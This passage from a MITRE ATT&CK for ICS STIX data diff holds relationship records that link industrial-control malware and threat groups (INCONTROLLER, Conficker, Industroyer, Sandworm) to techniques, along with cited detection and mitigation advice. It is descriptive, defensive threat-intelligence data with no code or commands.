"2022-09-29T01:37:13.671Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + }, + { + "source_name": "Brubaker-Incontroller", + "description": "Nathan Brubaker, Keith Lunden, Ken Proska, Muhammad Umair, Daniel Kapellmann Zafra, Corey Hildebrandt, Rob Caldwell. (2022, April 13). INCONTROLLER: New State-Sponsored Cyber Attack Tools Target Multiple Industrial Control Systems. Retrieved September 28, 2022.", + "url": "https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.441Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can use the CODESYS protocol to download programs to Schneider PLCs.(Citation: Wylie-22)(Citation: Brubaker-Incontroller) \n\n[INCONTROLLER](https://attack.mitre.org/software/S1045) can modified program logic on Omron PLCs using either the program download or backup transfer functions available through the HTTP server.(Citation: Wylie-22) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9cf83701-a347-47b4-a67b-280df95b275d", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:41:05.460Z", + "description": "Monitor for changes made to scheduled jobs that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--faa34cf6-cf32-4dc9-bd6a-8f7a606ff65b", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2683e59a-dee3-485a-a355-ed2ee0a23d5d", + "created": "2022-09-26T16:16:21.749Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:16:21.749Z", + "description": "Monitor applications logs for any access attempts to operational databases (e.g., historians) or other sources of operational data within the ICS environment. These devices should be monitored for adversary collection using techniques relevant to the underlying technologies (e.g., Windows, Linux).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--984992e3-0407-406a-b8dd-c114d8b2d9a2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.172Z", + "relationship_type": "mitigates", + "description": "Devices should authenticate all messages between master and outstation assets.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--842a2b85-4e77-4eb6-99e1-c4a231aadf48", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.187Z", + "relationship_type": "mitigates", + "description": "Network allowlists can be implemented through either host-based files or system host files to specify what external connections (e.g., IP address, MAC address, port, protocol) can be made from a device.\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e6e0ef82-2cb6-43fe-8f4a-b9e4d5a57b13", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.081Z", + "relationship_type": "mitigates", + "description": "Segment operational network and systems to restrict access to critical system functions to predetermined management systems. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--71422483-33e4-4131-a4ec-40322d91d8a0", + "created": "2019-06-24T17:20:24.258Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Catalin Cimpanu April 2016", + "description": "Catalin Cimpanu 2016, April 26 Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary Retrieved. 2019/10/14 ", + "url": "https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml" + }, + { + "source_name": "Symantec June 2015", + "description": "Symantec 2015, June 30 Simple steps to protect yourself from the Conficker Worm Retrieved. 2019/12/05 ", + "url": "https://support.symantec.com/us/en/article.tech93179.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-17T15:38:28.233Z", + "description": "[Conficker](https://attack.mitre.org/software/S0608) exploits Windows drive shares. Once it has infected a computer, [Conficker](https://attack.mitre.org/software/S0608) automatically copies itself to all visible open drive shares on other computers inside the network. (Citation: Symantec June 2015) Nuclear power plant officials suspect someone brought in [Conficker](https://attack.mitre.org/software/S0608) by accident on a USB thumb drive, either from home or computers found in the power plant's facility. (Citation: Catalin Cimpanu April 2016)", + "relationship_type": "uses", + "source_ref": "malware--58eddbaf-7416-419a-ad7b-e65b9d4c3b55", + "target_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6637d8e6-6578-4d15-a993-d63ced4c4464", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.099Z", + "relationship_type": "mitigates", + "description": "Authenticate all access to field controllers before authorizing access to, or modification of, a device's state, logic, or programs. Centralized authentication techniques can help manage the large number of field controller accounts needed across the ICS.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--00e6c22b-9275-4039-b6d4-2ac0680325d6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.104Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--8f7ccb2b-de2a-4a5c-9f1e-d5e58e69efa8", + "created": "2023-03-30T19:00:57.773Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:00:57.773Z", + "description": "Data loss prevention can restrict access to sensitive data and detect sensitive data that is unencrypted.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--337c4e2a-21a7-4d9a-bfee-9efd6cebf0e5", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--711f17c2-c9f6-4d8d-bf79-117fcdc592c0", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:29:38.448Z", + "description": "Monitor network traffic for default credential use in protocols that allow unencrypted authentication.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7dad75e6-f569-4bb9-ad75-5eda55dff0b1", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:54:12.966Z", + "description": "Monitor for API calls (such as GetAdaptersInfo() and GetIpNetTable()) that may gather details about the network configuration and settings, such as IP and/or MAC addresses. Also monitor for API calls that may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. For added context on adversary procedures and background see [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) and [System Network Connections Discovery](https://attack.mitre.org/techniques/T1049).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e", + "target_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--cf8ac499-8c1c-4615-b933-7587f1b9488b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.216Z", + "relationship_type": "mitigates", + "description": "The encryption of firmware should be considered to prevent adversaries from identifying possible vulnerabilities within the firmware.\n", + "source_ref": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--aa726ced-f2ac-4113-8d05-8687b7d7ff91", + "created": "2022-09-26T16:35:07.728Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:35:07.728Z", + "description": "Monitor for new master devices communicating with outstations, which may be visible in alarms within the ICS environment.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--15188683-7ded-4578-9102-73459ecbe095", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:37:54.914Z", + "description": "Monitor for newly executed processes related to services specifically designed to accept remote graphical connections, such as RDP and VNC. [Remote Services](https://attack.mitre.org/techniques/T0886) and [Valid Accounts](https://attack.mitre.org/techniques/T0859) may be used to access a host’s GUI.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2c6f9c9e-efa9-4a87-aadf-64b2aeeaa09a", + "created": "2021-04-11T14:06:54.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:54:43.581Z", + "description": "In the 2015 attack on the Ukrainian power grid, the [Sandworm Team](https://attack.mitre.org/groups/G0034) scheduled disconnects of uninterruptable power supply (UPS) systems so that when power was disconnected from the substations, the devices would shut down and service could not be recovered. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--94654460-b115-4056-beb1-e982ed33437b", + "created": "2023-03-30T18:59:46.674Z", + "revoked": false, + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T18:59:46.674Z", + "description": "Protect files stored locally with proper permissions to limit opportunities for adversaries to interact and collect information from the local system. (Citation: Keith Stouffer May 2015) (Citation: National Institute of Standards and Technology April 2013)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b8f6d6a8-e668-4596-8ec2-41c5d1bd211d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.097Z", + "relationship_type": "mitigates", + "description": "All field controllers should restrict the modification of programs to only certain users (e.g., engineers, field technician), preferably through implementing a role-based access mechanism.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--9cca3120-c95e-4f5e-bc4b-0521ab5cc512", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.203Z", + "relationship_type": "mitigates", + "description": "Segment operational network and systems to restrict access to critical system functions to predetermined management systems. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--bcaa4f7e-2e84-4bbb-9fb7-ca8fb003108f", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:49:50.583Z", + "description": "Authenticate connections fromsoftware and devices to prevent unauthorized systems from accessing protected management functions.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9f43126d-5f6c-42a9-9908-49175c27ead7", + "created": "2023-03-30T19:27:26.398Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Industroyer2 ESET April 2022", + "description": "ESET. (2022, April 12). Industroyer2: Industroyer reloaded. Retrieved March 30, 2023.", + "url": "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T15:49:13.700Z", + "description": "(Citation: Industroyer2 ESET April 2022)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--679d216f-9bf7-428a-8d5b-72a84d6d45ab", + "created": "2022-09-27T15:40:41.869Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "EyeofRa Detecting Hooking June 2017", + "description": "Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense against user-land. Retrieved December 12, 2017.", + "url": "https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/" + }, + { + "source_name": "Zairon Hooking Dec 2006", + "description": "Felici, M. (2006, December 6). Any application-defined hook procedure on my machine?. Retrieved December 12, 2017.", + "url": "https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/" + }, + { + "source_name": "Microsoft Hook Overview", + "description": "Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx" + }, + { + "source_name": "PreKageo Winhook Jul 2011", + "description": "Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.", + "url": "https://github.com/prekageo/winhook" + }, + { + "source_name": "Jay GetHooks Sept 2011", + "description": "Satiro, J. (2011, September 14). GetHooks. Retrieved December 12, 2017.", + "url": "https://github.com/jay/gethooks" + }, + { + "source_name": "Volatility Detecting Hooks Sept 2012", + "description": "Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.", + "url": "https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:43:36.888Z", + "description": "Monitor for API calls that can be used to install a hook procedure, such as the SetWindowsHookEx and SetWinEventHook functions.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e", + "target_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1299dd2d-4f42-4f5f-876b-bf7dacd17c79", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:10:34.653Z", + "description": "Monitor for a loss of network communications, which may indicate this technique is being used.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1fe3e5fc-7dd6-4e14-b9da-edb1a2aae459", + "created": "2022-09-23T16:35:17.240Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:34:31.627Z", + "description": "Consult asset management systems which may help with the detection of computer systems or network devices that should not exist on a network.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--83c8c216-7ff7-4bd3-9db4-573469628d95", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik August 2019", + "description": "Joe Slowik 2019, August 15 CRASHOVERRIDE: Reassessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack Retrieved. 2019/10/22 ", + "url": "https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:48:43.457Z", + "description": "The [Industroyer](https://attack.mitre.org/software/S0604) SPIROTEC DoS module places the victim device into firmware update mode. This is a legitimate use case under normal circumstances, but in this case is used the adversary to prevent the SPIROTEC from performing its designed protective functions. As a result the normal safeguards are disabled, leaving an unprotected link in the electric transmission. (Citation: Joe Slowik August 2019)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--21134484-2d59-46b7-b878-527121fff1e3", + "created": "2022-09-26T14:28:17.209Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:28:17.209Z", + "description": "Monitor asset logs for alarms or other information the adversary is unable to directly suppress. Relevant alarms include those from a loss of communications due to [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) activity.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + 